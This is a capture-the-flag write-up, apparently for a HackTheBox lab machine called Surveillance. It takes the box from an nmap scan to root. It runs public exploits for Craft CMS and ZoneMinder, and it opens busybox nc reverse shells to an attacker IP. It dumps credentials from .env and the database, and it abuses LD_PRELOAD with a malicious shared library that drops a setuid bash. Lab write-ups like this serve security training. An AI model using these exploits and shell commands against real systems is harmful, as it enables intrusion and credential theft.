Surveillance

Recon

nmap_scan.log

Open 10.129.230.42:22
Open 10.129.230.42:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.230.42

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN+/g3FqMmVlkT3XCSMH/JtvGJDW3+PBxqJ+pURQey6GMjs7abbrEOCcVugczanWj1WNU5jsaYzlkCEZHlsHLvk=
|   256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIm6HJTYy2teiiP6uZoSCHhsWHN+z3SVL/21fy6cZWZi
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://surveillance.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

SURVEILLANCE.HTB</a><br> <b>Powered by <a href="https://github.com/craftcms/cms/tree/4.4.14"/>Craft CMS</a></b>

CraftCMS_CVE-2023-41892 https://blog.calif.io/p/craftcms-rce Exploiting Arbitrary Object Instantiations in PHP without Custom Classes

└─$ git clone https://github.com/0xfalafel/CraftCMS_CVE-2023-41892.git
└─$ py CraftCMS_CVE-2023-41892/craft-cms.py
Usage: python CraftCMS_CVE-2023-41892/craft-cms.py <url>

└─$ py CraftCMS_CVE-2023-41892/craft-cms.py http://surveillance.htb/
[+] Executing phpinfo to extract some config infos
temporary directory: /tmp
web server root: /var/www/html/craft/web
[+] create shell.php in /tmp
[+] trick imagick to move shell.php in /var/www/html/craft/web
[+] Webshell is deployed: http://surveillance.htb//shell.php?cmd=whoami
[+] Remember to delete shell.php in /var/www/html/craft/web when youre done

[!] Enjoy your shell

> whoami
www-data

> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrade the webshell to reverse shell:

└─$ pwncat-cs -lp 4444
---
> busybox nc 10.10.14.113 4444 -e /bin/bash
---
(remote) www-data@surveillance:/var/www/html/craft$ cat .env
# Read about configuration, here:
# https://craftcms.com/docs/4.x/config/

# The application ID used to to uniquely store session and cache data, mutex locks, and more
CRAFT_APP_ID=CraftCMS--070c5b0b-ee27-4e50-acdf-0436a93ca4c7

# The environment Craft is currently running in (dev, staging, production, etc.)
CRAFT_ENVIRONMENT=production

# The secure key Craft will use for hashing and encrypting data
CRAFT_SECURITY_KEY=2HfILL3OAEe5X0jzYOVY5i7uUizKmB2_

# Database connection settings
CRAFT_DB_DRIVER=mysql
CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PORT=3306
CRAFT_DB_DATABASE=craftdb
CRAFT_DB_USER=craftuser
CRAFT_DB_PASSWORD=CraftCMSPassword2023!
CRAFT_DB_SCHEMA=
CRAFT_DB_TABLE_PREFIX=

# General settings (see config/general.php)
DEV_MODE=false
ALLOW_ADMIN_CHANGES=false
DISALLOW_ROBOTS=false

PRIMARY_SITE_URL=http://surveillance.htb/

Enumerate the database

(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -p'CraftCMSPassword2023!' -e 'SHOW DATABASES;'
+--------------------+
| Database           |
+--------------------+
| craftdb            |
| information_schema |
+--------------------+
(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -p'CraftCMSPassword2023!' craftdb -e 'SHOW TABLES;'
| users                      |
...
(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -p'CraftCMSPassword2023!' craftdb -e 'SELECT username, password, admin FROM users;'
+----------+--------------------------------------------------------------+-------+
| username | password                                                     | admin |
+----------+--------------------------------------------------------------+-------+
| admin    | $2y$13$FoVGcLXXNe81B6x9bKry9OzGSSIYL7/ObcmQ0CXtgw.EpuNcx8tGe |     1 |
+----------+--------------------------------------------------------------+-------+

There's 3 users on the box

(remote) www-data@surveillance:/var/www/html/craft$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
matthew:x:1000:1000:,,,:/home/matthew:/bin/bash
zoneminder:x:1001:1001:,,,:/home/zoneminder:/bin/bash

Hmm.. the password is probably not crackable so giving up on that.

There's a SQL backup in application

(remote) www-data@surveillance:/var/www/html/craft$ ls -Alh storage/backups/
total 20K
-rw-r--r-- 1 root root 20K Oct 17  2023 surveillance--2023-10-17-202801--v4.4.14.sql.zip

Download the file with pwncat

(local) pwncat$ download storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip

└─$ unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip -d backup_sql
Archive:  surveillance--2023-10-17-202801--v4.4.14.sql.zip
  inflating: backup_sql/surveillance--2023-10-17-202801--v4.4.14.sql
└─$ grep surveillance.htb backup_sql/surveillance--2023-10-17-202801--v4.4.14.sql
...
INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');

SSH (22)

Creds: matthew:starcraft122490

└─$ sshpass -p starcraft122490 ssh matthew@surveillance.htb
matthew@surveillance:~$ id
uid=1000(matthew) gid=1000(matthew) groups=1000(matthew)

User.txt

matthew@surveillance:~$ cat user.txt
a958adc51509dc681d225995433201e0

Privilege Escalation (zoneminder)

No luck with sudo

matthew@surveillance:~$ sudo -l
Sorry, user matthew may not run sudo on surveillance.

There are other web applications

matthew@surveillance:~$ ss -tunlp
Netid                State                 Recv-Q                Send-Q                                Local Address:Port                                 Peer Address:Port                Process
udp                  UNCONN                0                     0                                     127.0.0.53%lo:53                                        0.0.0.0:*
udp                  UNCONN                0                     0                                           0.0.0.0:68                                        0.0.0.0:*
tcp                  LISTEN                0                     128                                         0.0.0.0:22                                        0.0.0.0:*
tcp                  LISTEN                0                     80                                        127.0.0.1:3306                                      0.0.0.0:*
tcp                  LISTEN                0                     511                                       127.0.0.1:8080                                      0.0.0.0:*
tcp                  LISTEN                0                     511                                         0.0.0.0:80                                        0.0.0.0:*
tcp                  LISTEN                0                     4096                                  127.0.0.53%lo:53                                        0.0.0.0:*
tcp                  LISTEN                0                     128                                            [::]:22                                           [::]:*

matthew@surveillance:/etc/nginx/sites-enabled$ cat zoneminder.conf
server {
    listen 127.0.0.1:8080;

    root /usr/share/zoneminder/www;

    index index.php;

    access_log /var/log/zm/access.log;
    error_log /var/log/zm/error.log;

    location / {
        try_files $uri $uri/ /index.php?$args =404;

        location ~ /api/(css|img|ico) {
            rewrite ^/api(.+)$ /api/app/webroot/$1 break;
            try_files $uri $uri/ =404;
        }

        location /api {
            rewrite ^/api(.+)$ /api/app/webroot/index.php?p=$1 last;
        }

        location /cgi-bin {
            include fastcgi_params;

            fastcgi_param SCRIPT_FILENAME $request_filename;
            fastcgi_param HTTP_PROXY "";

            fastcgi_pass unix:/run/fcgiwrap.sock;
        }

        location ~ \.php$ {
            include fastcgi_params;

            fastcgi_param SCRIPT_FILENAME $request_filename;
            fastcgi_param HTTP_PROXY "";

            fastcgi_index index.php;

            fastcgi_pass unix:/var/run/php/php8.1-fpm-zoneminder.sock;
        }
    }
}

Port forward the application

└─$ sshpass -p starcraft122490 ssh matthew@surveillance.htb -L 800:127.0.0.1:8080

Default credentials admin:admin doesn't work, SSH credentials doesn't work, but admin:starcraft122490 works!

Creds: admin:starcraft122490

The version is v1.36.32

CVE-2023-26035

└─$ git clone https://github.com/heapbytes/CVE-2023-26035.git
└─$ py CVE-2023-26035/poc.py --target http://localhost:800/ --cmd 'busybox nc 10.10.14.113 4444 -e /bin/bash'
Fetching CSRF Token
Got Token: key:b3661e65078b87d40b5f49c3e2383a8fbb1288ca,1733601862
[>] Sending payload..
[!] Script executed by out of time limit (if u used revshell, this will exit the script)
---
└─$ pwncat-cs -lp 4444
(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ id
uid=1001(zoneminder) gid=1001(zoneminder) groups=1001(zoneminder)

Privilege Escalation (root)

(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ sudo -l
Matching Defaults entries for zoneminder on surveillance:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User zoneminder may run the following commands on surveillance:
    (ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
(remote) zoneminder@surveillance:/home/zoneminder$ ls /usr/bin/zm[a-zA-Z]*.pl
/usr/bin/zmaudit.pl    /usr/bin/zmonvif-probe.pl    /usr/bin/zmsystemctl.pl  /usr/bin/zmvideo.pl
/usr/bin/zmcamtool.pl  /usr/bin/zmonvif-trigger.pl  /usr/bin/zmtelemetry.pl  /usr/bin/zmwatch.pl
/usr/bin/zmcontrol.pl  /usr/bin/zmpkg.pl            /usr/bin/zmtrack.pl      /usr/bin/zmx10.pl
/usr/bin/zmdc.pl       /usr/bin/zmrecover.pl        /usr/bin/zmtrigger.pl
/usr/bin/zmfilter.pl   /usr/bin/zmstats.pl          /usr/bin/zmupdate.pl

Looks like this user has permissions to sudo any binary above without password, but rule looks tricky so we might do more.

Application allows setting LD_PRELOAD environment variable

(remote) zoneminder@surveillance:/tmp$ nano /tmp/pwn.c
(remote) zoneminder@surveillance:/tmp$ cat /tmp/pwn.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("install -m4777 /bin/bash /tmp/rootbash");
}

For some reason pwncat-cs wasn't working when running gcc because ld is missing... (???) upgrade to SSH

└─$ ssh-keygen -f id_rsa -P x -q && cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDgGu2C2GKJmIOqCW7eUcvNxVCLLnxqQ8/shNGyoELLM woyag@kraken
---
(remote) zoneminder@surveillance:/home/zoneminder$ mkdir ~/.ssh
(remote) zoneminder@surveillance:/home/zoneminder$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDgGu2C2GKJmIOqCW7eUcvNxVCLLnxqQ8/shNGyoELLM woyag@kraken' > ~/.ssh/authorized_keys
---
└─$ ssh zoneminder@surveillance.htb -i id_rsa
zoneminder@surveillance:/tmp$ gcc -fPIC -shared -o /tmp/pwn.so /tmp/pwn.c -nostartfiles
/tmp/pwn.c: In function ‘_init’:
/tmp/pwn.c:7:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    7 |     setgid(0);
      |     ^~~~~~
/tmp/pwn.c:8:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    8 |     setuid(0);
      |     ^~~~~~
zoneminder@surveillance:/tmp$ grep LD_PRELOAD /usr/bin/*.pl
/usr/bin/zmdc.pl:if ( $Config{ZM_LD_PRELOAD} ) {
/usr/bin/zmdc.pl:  Debug("Adding ENV{LD_PRELOAD} = $Config{ZM_LD_PRELOAD}");
/usr/bin/zmdc.pl:  $ENV{LD_PRELOAD} = $Config{ZM_LD_PRELOAD};
/usr/bin/zmdc.pl:  foreach my $lib ( split(/\s+/, $ENV{LD_PRELOAD} ) ) {
/usr/bin/zmdc.pl:      Warning("LD_PRELOAD lib $lib does not exist from LD_PRELOAD $ENV{LD_PRELOAD}.");

LD_PRELOAD exists only in zmdc

zoneminder@surveillance:/tmp$ sudo /usr/bin/zmdc.pl version
1.36.32
zoneminder@surveillance:/tmp$ ls -l /tmp/rootbasx
ls: cannot access '/tmp/rootbash': No such file or directory

zoneminder@surveillance:/tmp$ sudo /usr/bin/zmdc.pl -h
No daemon given
Usage:
    zmdc.pl {command} [daemon [options]]

Options:
    {command} - One of 'startup|shutdown|status|check|logrot' or
    'start|stop|restart|reload|version'. [daemon [options]] - Daemon name
    and options, required for second group of commands

zoneminder@surveillance:/tmp$ sudo /usr/bin/zmdc.pl startup zoneminder
Starting server
zoneminder@surveillance:/tmp$ ls -l
total 1416
-rw------- 1 www-data   www-data       200 Dec  7 19:22 phpylNcsK
-rw-r--r-- 1 zoneminder zoneminder     192 Dec  7 20:15 pwn.c
-rwxrwxr-x 1 zoneminder zoneminder   14344 Dec  7 20:23 pwn.so
-rwsrwxrwx 1 root       root       1396520 Dec  7 20:33 rootbash
drwx------ 3 root       root          4096 Dec  7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-ModemManager.service-M9fPjK
drwx------ 3 root       root          4096 Dec  7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-systemd-logind.service-URkGsr
drwx------ 3 root       root          4096 Dec  7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-systemd-resolved.service-S1o5w6
drwx------ 3 root       root          4096 Dec  7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-systemd-timesyncd.service-weSxYN
-rw-r--r-- 1 zoneminder zoneminder    2137 Dec  7 20:31 t.sh
drwx------ 2 root       root          4096 Dec  7 19:12 vmware-root_776-2965448177
drwxr-xr-x 2 www-data   www-data      4096 Dec  7 19:11 zm
zoneminder@surveillance:/tmp$ ls -l /tmp/rootbash
-rwsrwxrwx 1 root root 1396520 Dec  7 20:33 /tmp/rootbash

version doesn't trigger it, but startup did.

Root.txt

zoneminder@surveillance:/tmp$ /tmp/rootbash -p
rootbash-5.1# id
uid=1001(zoneminder) gid=1001(zoneminder) euid=0(root) groups=1001(zoneminder)
rootbash-5.1# cat /root/root.txt
bcfcd349bb8b30f067008b14fd26c079

PreviousSupport NextTimelapse

Last updated 8 months ago

hashtagRecon

hashtagHTTP (80)

hashtagSSH (22)

hashtagUser.txt

hashtagPrivilege Escalation (zoneminder)

hashtagPrivilege Escalation (root)

hashtagRoot.txt